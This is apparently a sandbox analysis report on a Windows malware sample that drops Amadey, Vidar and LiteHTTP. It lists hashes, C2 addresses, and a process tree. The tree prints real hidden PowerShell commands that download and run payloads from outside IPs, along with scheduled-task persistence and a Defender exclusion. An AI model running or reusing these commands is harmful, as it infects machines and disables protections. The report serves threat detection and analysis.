Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 20:49

General

  • Target

    3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe

  • Size

    938KB

  • MD5

    1fa9c173c6abaae5709ca4b88db07aa5

  • SHA1

    dc77a5b0aeede04510ad4604ff58af13fd377609

  • SHA256

    3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247

  • SHA512

    8bf7ea16e4ac88460842de1ab9abeeccb930d1bd309a8d06e2e33fab96cdd8a6f7a001dede7eedbe3511cba20e8799591e45a1a00bb484899bc255f3af811534

  • SSDEEP

    24576:OqDEvCTbMWu7rQYlBQcBiT6rprG8a09u:OTvC/MTQYxsWR7a09

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 6 IoCs
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 18 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe
    "C:\Users\Admin\AppData\Local\Temp\3f8fba6c55005a7dc441c57cb7099c0c77d5df62c495e1fcbf17ab06291b4247.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 0NNWEman1C3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\QRpn8Br4V.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn 0NNWEman1C3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\QRpn8Br4V.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2800
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\QRpn8Br4V.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ELOJCTNJH2O0WUQ2VZPFHNPACLJPDGV1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Users\Admin\AppData\Local\TempELOJCTNJH2O0WUQ2VZPFHNPACLJPDGV1.EXE
          "C:\Users\Admin\AppData\Local\TempELOJCTNJH2O0WUQ2VZPFHNPACLJPDGV1.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2060
            • C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe
              "C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1932
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 1060
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1744
            • C:\Users\Admin\AppData\Local\Temp\10106480101\Ps7WqSx.exe
              "C:\Users\Admin\AppData\Local\Temp\10106480101\Ps7WqSx.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1376
            • C:\Users\Admin\AppData\Local\Temp\10106490101\FvbuInU.exe
              "C:\Users\Admin\AppData\Local\Temp\10106490101\FvbuInU.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:1736
            • C:\Users\Admin\AppData\Local\Temp\10106500101\SvhQA35.exe
              "C:\Users\Admin\AppData\Local\Temp\10106500101\SvhQA35.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1992
              • C:\Users\Admin\AppData\Local\Temp\onefile_1992_133856814308320000\chromium.exe
                C:\Users\Admin\AppData\Local\Temp\10106500101\SvhQA35.exe
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1316
            • C:\Users\Admin\AppData\Local\Temp\10106510101\mAtJWNv.exe
              "C:\Users\Admin\AppData\Local\Temp\10106510101\mAtJWNv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2576
              • C:\Users\Admin\AppData\Local\Temp\10106510101\mAtJWNv.exe
                "C:\Users\Admin\AppData\Local\Temp\10106510101\mAtJWNv.exe"
                7⤵
                • Executes dropped EXE
                PID:2772
              • C:\Users\Admin\AppData\Local\Temp\10106510101\mAtJWNv.exe
                "C:\Users\Admin\AppData\Local\Temp\10106510101\mAtJWNv.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:2896
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 512
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2828
            • C:\Users\Admin\AppData\Local\Temp\10106520101\ce4pMzk.exe
              "C:\Users\Admin\AppData\Local\Temp\10106520101\ce4pMzk.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2432
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\wzcuFDtq\Anubis.exe""
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2128
            • C:\Users\Admin\AppData\Local\Temp\10106540101\MCxU5Fj.exe
              "C:\Users\Admin\AppData\Local\Temp\10106540101\MCxU5Fj.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:868
              • C:\Users\Admin\AppData\Local\Temp\10106540101\MCxU5Fj.exe
                "C:\Users\Admin\AppData\Local\Temp\10106540101\MCxU5Fj.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3024
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 1040
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:600
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 868 -s 504
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1048
            • C:\Users\Admin\AppData\Local\Temp\10106670101\2f063bb590.exe
              "C:\Users\Admin\AppData\Local\Temp\10106670101\2f063bb590.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:1304
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn jhXDcmaX3eO /tr "mshta C:\Users\Admin\AppData\Local\Temp\5ijZ86AZI.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                PID:568
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn jhXDcmaX3eO /tr "mshta C:\Users\Admin\AppData\Local\Temp\5ijZ86AZI.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1148
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\5ijZ86AZI.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2080
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YUPPXEEUBNTXKXAXCZB8FAGU6HL3VP9L.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1324
                  • C:\Users\Admin\AppData\Local\TempYUPPXEEUBNTXKXAXCZB8FAGU6HL3VP9L.EXE
                    "C:\Users\Admin\AppData\Local\TempYUPPXEEUBNTXKXAXCZB8FAGU6HL3VP9L.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2808
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1772
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:1552
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1872
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1732
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:884
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1564
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2900
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2944
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "AnVZsmap8y1" /tr "mshta \"C:\Temp\bAtudFXDW.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:304
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\bAtudFXDW.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:1764
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2320
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2868
            • C:\Users\Admin\AppData\Local\Temp\10106700101\v6Oqdnc.exe
              "C:\Users\Admin\AppData\Local\Temp\10106700101\v6Oqdnc.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2252
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2252 -s 1200
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1672
            • C:\Users\Admin\AppData\Local\Temp\10106710101\dbf60ea272.exe
              "C:\Users\Admin\AppData\Local\Temp\10106710101\dbf60ea272.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1596
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1212
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1784
            • C:\Users\Admin\AppData\Local\Temp\10106720101\5e73a9241d.exe
              "C:\Users\Admin\AppData\Local\Temp\10106720101\5e73a9241d.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2784
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:916
            • C:\Users\Admin\AppData\Local\Temp\10106730101\ab0a7cea2e.exe
              "C:\Users\Admin\AppData\Local\Temp\10106730101\ab0a7cea2e.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1056
              • C:\Users\Admin\AppData\Local\Temp\10106730101\ab0a7cea2e.exe
                "C:\Users\Admin\AppData\Local\Temp\10106730101\ab0a7cea2e.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2188
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 516
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1704
            • C:\Users\Admin\AppData\Local\Temp\10106740101\d15d9678b8.exe
              "C:\Users\Admin\AppData\Local\Temp\10106740101\d15d9678b8.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1720
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2232
            • C:\Users\Admin\AppData\Local\Temp\10106750101\9f08bd380b.exe
              "C:\Users\Admin\AppData\Local\Temp\10106750101\9f08bd380b.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2024
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106761121\PcAIvJ0.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2412
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2880
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2132
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106771121\PcAIvJ0.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2560
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3020
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:664

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\348FCBA0FFA8270F.dat

    Filesize

    46KB

    MD5

    02d2c46697e3714e49f46b680b9a6b83

    SHA1

    84f98b56d49f01e9b6b76a4e21accf64fd319140

    SHA256

    522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

    SHA512

    60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    71KB

    MD5

    83142242e97b8953c386f988aa694e4a

    SHA1

    833ed12fc15b356136dcdd27c61a50f59c5c7d50

    SHA256

    d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

    SHA512

    bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8P9TO0C6\service[1].htm

    Filesize

    1B

    MD5

    cfcd208495d565ef66e7dff9f98764da

    SHA1

    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

    SHA256

    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

    SHA512

    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

  • C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe

    Filesize

    361KB

    MD5

    2bb133c52b30e2b6b3608fdc5e7d7a22

    SHA1

    fcb19512b31d9ece1bbe637fe18f8caf257f0a00

    SHA256

    b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630

    SHA512

    73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

  • C:\Users\Admin\AppData\Local\Temp\10106480101\Ps7WqSx.exe

    Filesize

    6.8MB

    MD5

    dab2bc3868e73dd0aab2a5b4853d9583

    SHA1

    3dadfc676570fc26fc2406d948f7a6d4834a6e2c

    SHA256

    388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb

    SHA512

    3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

  • C:\Users\Admin\AppData\Local\Temp\10106490101\FvbuInU.exe

    Filesize

    1.8MB

    MD5

    f155a51c9042254e5e3d7734cd1c3ab0

    SHA1

    9d6da9f8155b47bdba186be81fb5e9f3fae00ccf

    SHA256

    560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af

    SHA512

    67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

  • C:\Users\Admin\AppData\Local\Temp\10106500101\SvhQA35.exe

    Filesize

    11.5MB

    MD5

    9da08b49cdcc4a84b4a722d1006c2af8

    SHA1

    7b5af0630b89bd2a19ae32aea30343330ca3a9eb

    SHA256

    215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd

    SHA512

    579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

  • C:\Users\Admin\AppData\Local\Temp\10106510101\mAtJWNv.exe

    Filesize

    350KB

    MD5

    b60779fb424958088a559fdfd6f535c2

    SHA1

    bcea427b20d2f55c6372772668c1d6818c7328c9

    SHA256

    098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221

    SHA512

    c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

  • C:\Users\Admin\AppData\Local\Temp\10106520101\ce4pMzk.exe

    Filesize

    48KB

    MD5

    d39df45e0030e02f7e5035386244a523

    SHA1

    9ae72545a0b6004cdab34f56031dc1c8aa146cc9

    SHA256

    df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

    SHA512

    69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

  • C:\Users\Admin\AppData\Local\Temp\10106540101\MCxU5Fj.exe

    Filesize

    415KB

    MD5

    641525fe17d5e9d483988eff400ad129

    SHA1

    8104fa08cfcc9066df3d16bfa1ebe119668c9097
